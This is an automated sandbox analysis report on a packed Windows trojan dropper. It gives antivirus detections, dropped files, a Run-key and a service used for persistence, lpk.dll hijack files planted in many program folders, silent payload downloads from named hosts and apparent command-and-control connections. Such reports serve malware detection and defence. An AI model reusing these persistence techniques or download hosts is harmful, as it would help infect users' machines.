Analysis Date2015-03-29 02:10:11
MD55b324560d2718da8668d2f474d499fe5
SHA196af660862739e96d81e07ad5111e54f63ece4aa

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 4df425296fd60a3822242916a9a3b59d sha1: 0b336627afb87ddcab43b0f745fb226b336fdd62 size: 36864
Section.rsrc md5: b699d473496f7ce1447bb2661b40d864 sha1: a4883b92084a355ef57db2e1b8572aaf1d2da1d2 size: 10240
Timestamp2009-11-06 06:21:39
PackerUPX -> www.upx.sourceforge.net
PEhash22fd5d3661574401736a1a1ee083601e69cd2567
IMPhash575ea90c069471216fa3adaba586119e
AV360 Safeno_virus
AVAd-AwareDropped:Generic.ServStart.EB4C0F55
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Dropped:Generic.ServStart.EB4C0F55
AVAuthentiumW32/Agent.FI.gen!Eldorado
AVAvira (antivir)TR/Dldr.Agent.D0.3
AVBullGuardDropped:Generic.ServStart.EB4C0F55
AVCA (E-Trust Ino)Win32/Tnega.TD
AVCAT (quickheal)TrojanDropper.Crypter.fz.n3
AVClamAVTrojan.Dropper-22815
AVDr. WebTrojan.MulDrop.32183
AVEmsisoftDropped:Generic.ServStart.EB4C0F55
AVEset (nod32)Win32/TrojanDropper.Agent.PIT
AVFortinetW32/Agent.PIT!tr
AVFrisk (f-prot)W32/Agent.FI.gen!Eldorado
AVF-SecureDropped:Generic.ServStart.EB4C0F55
AVGrisoft (avg)Generic18.CWT
AVIkarusBackdoor.Win32.Banito
AVK7Trojan ( 0030b2a81 )
AVKaspersky 2015Trojan-Dropper.Win32.Agent.gato
AVMalwareBytesTrojan.Dropper
AVMcafeegeneric!bg.fgl
AVMicrosoft Security EssentialsBackdoor:Win32/Zegost.BZ
AVMicroWorld (escan)Dropped:Generic.ServStart.EB4C0F55
AVRisingDropper.Win32.Undef.uw
AVSophosTroj/Mdrop-CGE
AVSymantecno_virus
AVTrend MicroTROJ_AGENT.SMX
AVVirusBlokAda (vba32)Trojan.Win32.Genome.dfab

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul

Creates Filenul
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e"

Creates ProcessC:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe"

Creates ProcessC:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e"

Creates ProcessC:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\qqpcmgr_silent_782"

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe"

Creates ProcessC:\PROGRA~1\COMMON~1\pps_silent_782130248.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe"

Creates ProcessC:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\haozip_silent_782130"

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\1.exe"

Creates ProcessC:\PROGRA~1\COMMON~1\1.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e"

Creates ProcessC:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e

Process
↳ C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe

Creates FileC:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe

Creates FileC:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe

Creates FileC:\PROGRA~1\COMMON~1\OQOWKA~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scs4.tmp
Creates FileC:\WINDOWS\TEMP\scs5.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Deletes FileC:\WINDOWS\TEMP\scs4.tmp
Deletes FileC:\WINDOWS\TEMP\scs5.tmp

Process
↳ C:\PROGRA~1\COMMON~1\1.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\PROGRA~1\COMMON~1\1.EXE
Creates FileC:\WINDOWS\TEMP\scs3.tmp
Deletes FileC:\WINDOWS\TEMP\scs3.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe

RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Pqrstu Wxyabcde Ghi\Description ➝
Pqrstuvw Yabcdefgh Jklmnop Rstuvwxy Bcd
Creates FileC:\WINDOWS\nwzvwy.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul
Creates MutexC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates ServicePqrstu Wxyabcde Ghijklmn Pqrs - C:\WINDOWS\nwzvwy.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe

Creates FileC:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e
Creates FileC:\PROGRA~1\COMMON~1\qqpcmgr_silent_782
Creates FileC:\PROGRA~1\COMMON~1\1.exe
Creates FileC:\PROGRA~1\COMMON~1\haozip_silent_782130
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e
Creates FileC:\PROGRA~1\COMMON~1\pps_silent_782130248.exe
Creates FileC:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe
Creates FileC:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\1.exe"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\haozip_silent_782130"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\qqpcmgr_silent_782"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e"
Creates Processcmd /c "C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e"
Winsock URLhttp://download.58611.net:8181/baiduan/baiduan_silent_782130248.e
Winsock URLhttp://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782
Winsock URLhttp://www.fz1433.com/1.exe
Winsock URLhttp://download.58611.net:8181/haozip_silent/haozip_silent_782130
Winsock URLhttp://d.union.ijinshan.com/duba/link/oqowKAVSETUPS_66_130903.exe
Winsock URLhttp://download.58611.net:8181/pps/pps_silent_782130248.exe
Winsock URLhttp://d.union.ijinshan.com/liebao/link/ksbinstaller_s_66_87703.e
Winsock URLhttp://download.58611.net:8181/uc/UCBrowser_silent_782130248.exe
Winsock URLhttp://download.58611.net:8181/baidusd/baidusd_silent_782130248.e

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ Pid 1016

Process
↳ Pid 1116

Process
↳ Pid 1204

Process
↳ Pid 1292

Process
↳ Pid 1844

Process
↳ Pid 1636

Process
↳ C:\WINDOWS\nwzvwy.exe

Creates FilePIPE\DAV RPC SERVICE
Creates FileC:\Program Files\Windows Media Player\lpk.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\lpk.dll
Creates FileC:\Program Files\Messenger\lpk.dll
Creates FileC:\Program Files\MSN Gaming Zone\Windows\lpk.dll
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\lpk.dll
Creates FileC:\Program Files\Windows NT\Accessories\lpk.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Temp\lpk.dll
Creates Filemm33.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Speech\lpk.dll
Creates FilePIPE\wkssvc
Creates FileC:\Program Files\Outlook Express\lpk.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll
Creates FileC:\temp\lpk.dll
Creates FileC:\Program Files\Internet Explorer\lpk.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\lpk.dll
Creates FileC:\RCX1.tmp
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Windows NT\lpk.dll
Creates FileC:\lpk.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\lpk.dll
Creates FileC:\Program Files\Internet Explorer\Connection Wizard\lpk.dll
Creates FileC:\Program Files\Movie Maker\lpk.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\MSInfo\lpk.dll
Creates FileC:\Program Files\Windows NT\Pinball\lpk.dll
Creates Filepipe\net\NtControlPipe10
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\lpk.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\lpk.dll
Creates FileC:\Program Files\NetMeeting\lpk.dll
Deletes Filemm33.dll
Creates MutexPqrstu Wxyabcde Ghi
Creates MutexC:\WINDOWS\nwzvwy.exe
Creates MutexDBWinMutex

Network Details:

DNS90f51169a3108215.cdn.fhldns.com
Type: A
222.216.190.60
DNS90f51169a3108215.cdn.fhldns.com
Type: A
61.155.149.76
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.12
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.9
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.10
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.11
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.234.12
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.9
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.10
DNStf01.dlmix.glb0.lxdns.com
Type: A
8.37.235.11
DNSdownload.58611.net
Type: A
218.241.29.215
DNSlinfeng.sytes.net
Type: A
DNSwww.fz1433.com
Type: A
DNSd.union.ijinshan.com
Type: A
HTTP GEThttp://www.fz1433.com/1.exe
User-Agent:
HTTP GEThttp://d.union.ijinshan.com/duba/link/oqowKAVSETUPS_66_130903.exe
User-Agent:
HTTP GEThttp://d.union.ijinshan.com/liebao/link/ksbinstaller_s_66_87703.e
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1031 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1034 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1043 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1052 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1054 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1062 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1071 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1076 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1081 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1090 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1098 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1100 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1102 ➝ 222.216.190.60:80
Flows TCP192.168.1.1:1110 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1117 ➝ 8.37.235.12:80
Flows TCP192.168.1.1:1120 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1123 ➝ 1.93.10.147:7777
Flows TCP192.168.1.1:1125 ➝ 8.37.235.12:80
Flows TCP192.168.1.1:1131 ➝ 216.99.157.163:8080
Flows TCP192.168.1.1:1133 ➝ 218.241.29.215:8181

Raw Pcap
0x00000000 (00000)   e401                                  ..

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   e201                                  ..

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   e401                                  ..

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   47455420 2f312e65 78652048 5454502f   GET /1.exe HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a2077 77772e66   1.1..Host: www.f
0x00000020 (00032)   7a313433 332e636f 6d0d0a0d 0a         z1433.com....

0x00000000 (00000)   e301                                  ..

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   47455420 2f647562 612f6c69 6e6b2f6f   GET /duba/link/o
0x00000010 (00016)   716f774b 41565345 54555053 5f36365f   qowKAVSETUPS_66_
0x00000020 (00032)   31333039 30332e65 78652048 5454502f   130903.exe HTTP/
0x00000030 (00048)   312e310d 0a486f73 743a2064 2e756e69   1.1..Host: d.uni
0x00000040 (00064)   6f6e2e69 6a696e73 68616e2e 636f6d0d   on.ijinshan.com.
0x00000050 (00080)   0a0d0a57 5f339f64 93841129 505f2f66   ...W_3.d...)P_/f
0x00000060 (00096)   6756ab48 77582e01 01b99f56 271221c3   gV.HwX.....V'.!.
0x00000070 (00112)   c60ebaf9 c7d6f21d 245801c1 ca492603   ........$X...I&.
0x00000080 (00128)   020283de 0e8d8908 979f0e04 41083161   ............A.1a
0x00000090 (00144)   c5c6f7c0 1141a839 1d5f68cb ece51611   .....A.9._h.....
0x000000a0 (00160)   e117eae8 afec626c 696ce8c2 400448d5   ......blil..@.H.
0x000000b0 (00176)   07121640 6c70e68d c18585a7 368204d7   ...@lp......6...
0x000000c0 (00192)   321f2edf f4f67039 c8ce0d6e f719de     2.....p9...n...

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   e401                                  ..

0x00000000 (00000)   47455420 2f6c6965 62616f2f 6c696e6b   GET /liebao/link
0x00000010 (00016)   2f6b7362 696e7374 616c6c65 725f735f   /ksbinstaller_s_
0x00000020 (00032)   36365f38 37373033 2e652048 5454502f   66_87703.e HTTP/
0x00000030 (00048)   312e310d 0a486f73 743a2064 2e756e69   1.1..Host: d.uni
0x00000040 (00064)   6f6e2e69 6a696e73 68616e2e 636f6d0d   on.ijinshan.com.
0x00000050 (00080)   0a0d0a57 5f339f64 b3881129 505f2f66   ...W_3.d...)P_/f
0x00000060 (00096)   6756ab48 77582e01 01b99f56 271221c3   gV.HwX.....V'.!.
0x00000070 (00112)   c60ebaf9 c7d6f21d 24a8c2c7 c6c904e0   ........$.......
0x00000080 (00128)   73364306 8accc5cc ce13cbc1 c764c501   s6C..........d..
0x00000090 (00144)                                         

0x00000000 (00000)   b0                                    .

0x00000000 (00000)   b0                                    .


Strings
|.
u
Q\w.A
.
.
X|.
u
Q\w.A
.

0?@B|Y
0k(uGI
0~>N|Nd
0r'oN%];
0sKur>^
 $0ZmY
;	@1\0#}Z
1*a/M^^
$[1C#t/
1	\*@x
-2004 Jean-loup Gail+
2.9Gcw/x
_2-^9!Z
2b5@~/
2l16>J
;2NzW$
-_;2`PQL
2+s>8>I+
2U~m=#-#d
2"&Y_ec
2Y&Swv
>32A^+
37y2?{
3Modul
3s set
{3x<%S3j
3)zX./
4<35496
4-40e	8C
}45x,P+(
'4bd5x
`}!4d4N
4>Eu"x
4M8@P`p
]4">Zof0
;%5A1,
5xh-^)
6U?hLF
`;6z$%
7D{t6C#
7Imyyk
?7jJ~G
8MZuA<
9%1cAc
9Elv1m
9^:FX~
9(`[x|x
9Z3U) 
<=*a2w
A6'F9<FEt-1:
aeEM{m
aF)(}v
anUQB<*/o]v/
atez.2
b17<OJ
~@B3Ed
b}7aCi
B8\?J^
Bam6/09O4
BDE-9`D
bl=k@D`
$BN}"DNRich|"DN
_buffU
b-yT6a
}<C3Upy
c$Bx]d
CCM<<R#~t$~
C]=cQP
+[c,eb
CFIQsN
c#f{lowi8sS
]CHSDH<
c^Oat1
 Copyright
Czs!<7
^d/6RB
+DM<wJ
|"DN|"DN|"DN
"DN|"ENN"DNJ
;DR;ErW
DS\Tf2
D%vM&D-
/)Dzj=
DZSq=z
DZu<W)a
#E>/1v&
E2N&SA
ebmmEb
EGwww|iH
=,eh"q^
ejP(KZ
et#/.S
Eu9*e/
ev9q|2R
Ew<gGuG
ewh/?y
ExitProcess
_*ex\/X
^^)[f2
f2iH20
F2P306
fAEIRz
FB6[$a
}`FC0xc
FdVP\s
`fj d_
&Flush
+"f`%N
f/*nPn
f]osM8
F)S0XxF
FSdbT)-n-
F-+v/l
g<9nx_
g:cT[7
GetLa2A
GetProcAddress
gg|7/kS
gH<kjW
{GiSa~e
__GLOBAL_HEAP_SELECTED
GlWF,Y
gPZ3NB
g.RY.A
gt.('L
gu(s_02f
GyKcbw
Gz< s.
+g[;zy
H*0""W
heap7'
#Huc)Gfr
HZy3Bh
	I0wsn
`!*^I1
\I6<*6`
/)Ib4{g
]idfs]
IiGM>nw
iKHEn=
|iui<m
iValiz
,iW8|a
&iZB#4
/*=>J\
)J0a}1
@j_0Wp
>.$J3	D
jdXy^>Pw
	#j.+e?
jE5phsB
j|FBdB
_J,iaU
JLMH`i
:#jm:I)?
>JNr"DNJ
?-JoG3+
)jVkF8n&
jx$.k9
'K)?>~
+K4z,{2Z>
&K8A\_
- Kablto57
kCqBi<!
K>Ct/t/
KD@m>B5
k<#d(x
#keH~N
KERNEL32.DLL
#K@#FP
.k.kGT
\%,kl-
KM^`knCh
>knZe1Hm4"
,K%@Pf
;(]KS1
k ^+?y
Kz?nII
l\`3DY
l#7Q^VV
l7RO}_
lb,6Yn
l!;b	F
lbF+F<
LCb^)B~
lcCqA0
!lc|W F
LhnfH6
<	Li_'
$l|^lC
:LLO$u
LMb#{'
|\l$n\
lo02PQRW
LoadLibraryA
loseHand
LtNE{@9d
lUwJ&\
L#x`Lj
\lZqw-$
m0HTWF
m2hry:n:
M7(@j	+
MalTN}j
mERjY+c
mfT^Uc
$m]?H'
/=>mOBM'
MSVCRT7
~M&u@SYU
my_zDZ
n"!Abr
nc>7\r
n}'E5A42E7E
NlVx$0
NND"DN
npT*\TE
NQAW0x
{|nqvv
+"NU'c(
o2fb)# 
>O-9^19
{OEM	eAddriM(
oFi+e[
og(&i|A
-+~Oj3
olGY)h
oLO:w1
ON{"DN
|]|OX/
(P`[%>
P6vh|$
	P;c=.
p@gram J
P_j|gBPU|
Pl)>^t
PMark A
#PoNabZ
P`T;yi0
pVMn5}
py|7&S
pY	F~0
Q4^b- w
Q7~F;?
Q^)-?D
QDj2,,U
QE3z@h
qet7(%YN
Qkkbal
qL\Hf9t
.QMkvC
QruJh>|
Q#s(-4
>QvL\U
~\rgD8T
Ri"Hb25(
r)jU(f
R.nD"/
Rp)MO2<
r^pNI(
rr^nvp
RWgJK-MF
rY!e/:
s,\Fads
s*Gzc>
sh0dT+
SHELL32.dll
ShellExecuteA
SJ j"g
'sk); 
sOIfCn
s."\r~
[;S,st
s*]"Th
StqngT
sX~eI*a	
t]1?dL
TaiN(;a
^_[tbB
Temp{ADAB6D
!This program cannot be run in DOS mode.
!tJ#U}
TlBIaC
TP3`;LR
t Tcc^
$<=t<V9
^[t;VT
,t&W|P
&T"zlh
u'|2!6
u2[yI[
!u6/i5f
u=,b_5,	
UBR/{u
uC&ib"^
uG spa#`
U'~jLh
`uL$lH
usMX1<MES
uVMY 5
+Uwjr[
v7]w0h
v9\$<G
Va4PpRC
VC20XC0M
ve9GU3
!vFuo9 
vHwRxu
+virtu!3
VirtualProtect
VIS~E0
vjtpE@
Vkas%3
^vr17P
vto=o\\~
V%x"TV
vyiDF'y
>$v+ZI
W0`p]`(
w",0Vc
}w2CSK`
W9K>uv
WAwm94
W/b87rT
W)d.fJ}VS
;'whw%
WideCNrToMuB
@& *WjIac+ 
W_%$L@cY
`_w+lm
=WN~"DN
%wO/C}
w+OQvr
w|QnRwo
[WSOKG
}	*wtp*D
<*wTX7
:`W&Vs'c$
?WY	S&x
^^w*;Z
!}x&2	
]X5Kmb1"23p
x!7"D9
x?bMPFF
X]cH]"tN
~{XN[Cc
XPTPSW
x$ZjZ<(
;@%Yc(
YE[8v+
y-}	,g
yGwYCt
y$H!h^
ymN (^
yNUgfe
y{#>^P
@}Y^&t
!^,y+V
!YYf*GfP
y,z|$m
zA'~g9
zbAxM%
ZGd5r8,
?[z~!t
 z|vXK